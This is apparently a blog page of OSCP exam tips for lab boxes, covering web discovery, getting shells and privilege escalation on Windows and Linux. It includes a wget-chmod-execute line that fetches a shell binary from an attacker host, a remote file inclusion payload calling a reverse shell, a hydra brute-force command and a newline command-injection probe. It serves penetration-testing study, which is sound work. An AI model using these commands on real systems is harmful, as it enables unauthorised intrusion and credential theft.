blakejarvis.com
Search
K

OSCP - Things to Try When Stuck

Stuck on a box? Try the ideas below I learned from OSCP practice boxes.

Initial Access

Web discovery

  • Search for http://site/[hostname] if you can't find a directory or software you think should exist.
  • Try both GET and POST methods for all URLs given that may be blocking data via a particular HTTP method.
  • Fuzz parameters with ffuf.
  • Examine response headers for minor custom errors.

Getting a shell

  • To save time, upload a web shell instead of manually executing PHP commands.
  • Some PHP local file inclusion vulnerabilities can reference remote resources with ?path=http://[kali ip]/rev-shell.php.
  • Break up an exploit. Use Wireshark to watch for ICMP pings back home instead of going for a reverse shell right away.
  • Instead of sharing a full rev shell payload, download an elf, +x, and execute it all in 1 command: wget -P /tmp http://kali/shell.elf && chmod +x /tmp/shell.elf && /tmp/shell.elf
  • If a CMS has an RCE, look closely at what/where it's implemented. If it has /skins/ in a proof-of-concept URL, check for that functionality in admin panel or in online documentation.
  • When calling back on a port (web request, shell, etc.) try multiple ports if the first fails.
  • Piece together multiple initial access exploits. If one creates a web account and tries for a shell and fails, add exit(0) in the python script after the account is created and use the credentials for another exploit.
  • Use the same ports the box has open for shell callbacks.
  • Try at least 4 ports and ping when trying to get a callback.
  • If you can control data being read to the server, always consider serialization.
  • Always test payloads locally, especially if it's blind.
  • Consider where can you write data to that's then read back in to the server.

General

  • Don't spin wheels on other routes if something has a known exploit to root and it's a 10 pointer.
  • Check version numbers to ensure something isn't a false flag.
  • Consider similar protocols. If you get an SSH key, try using it over SCP.
  • Type version numbers carefully!
  • For hydra always do -e nsr. Example: hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.1 ftp -vV -f -e nsr -I
  • Look for auth-owners in nmap to get usernames.
  • FTP - always be in a directory on kali that's writable to download files.
  • FTP brute force "admin".
  • Search Metasploit modules for ideas https://github.com/rapid7/metasploit-framework.
  • Search a software's Github page for version files that would give specific information.
  • See Proving Grounds' Dibble for node.js RCE.
  • Review page source code for commented out areas for every page.
  • Guess parameters. If there's a POST forgot_pass.php with an email param, try GET /forgot_pass.php?email=%0aid.
  • Parameter/command injection fuzzing:
  • When brute forcing credentials, guess the software name as the username and password.
  • When dealing with file type uploads, try specifying just the header like GIF89a;. Files pulled from Google Images could be made different and not identified as a GIF.

Windows Privilege Escalation

  • Explore the C:\ drive root. Some scheduled tasks can't be seen as a low level user could be located at C:\.
  • Always test a reverse shell on a windows box when attempting to get a shell.
  • Explore alternatives to a reverse shell. Leverage exposed remote access protocols. For example, if a reverse shell doesn't work, execute a command to change the Administrator password and used smbexec to auth.
  • Identify all users. Attempt to brute force authentication via RDP
  • Always view "C:\program files" and "C:\program files (x86)" for installed apps.

Linux Privilege Escalation

  • Privesc scripts aren't always right:
    • e.g. a decoy exist item in crontab when sudo -l reveals a process dumper used to get credentials from memory.
  • If a process dumper is available, don't Google too deep. See if there are custom "password" processes to target.
  • su root is the best way to switch to root if you have a password but aren't in root group.
  • Identify all users. Attempt to brute force auth ssh if /home or /etc/passwd is pulled.
  • Always run echo $PATH to show available commands/locations.
  • Docker - see Proving Grounds' Sirol/Escape box.
  • If a user is in a group, it's probably for a reason.
  • Fully understand software that's related to a user's group (e.g. fail2ban group).
  • Use pspy to spy on processes and cronjobs you may not be able to see
  • Run groups.
  • cat ~/.profile && cat ~/.bashrc.
  • If running as www-data, always inspect the contents of html or the application, look for commented out passwords.
  • If another user exist, always su [user] with no password and their name as the password.
  • Check /var/backups.
  • Custom SUIDs won't be highlighted as linpeas and other privesc scripts don't know what they are.
    • Examine each and every SUD!
  • Run linux-smart-enumeration/lse.sh as a backup privilege escalation script.
  • Files with caps / capabilities - see Proving Grounds' Escape box.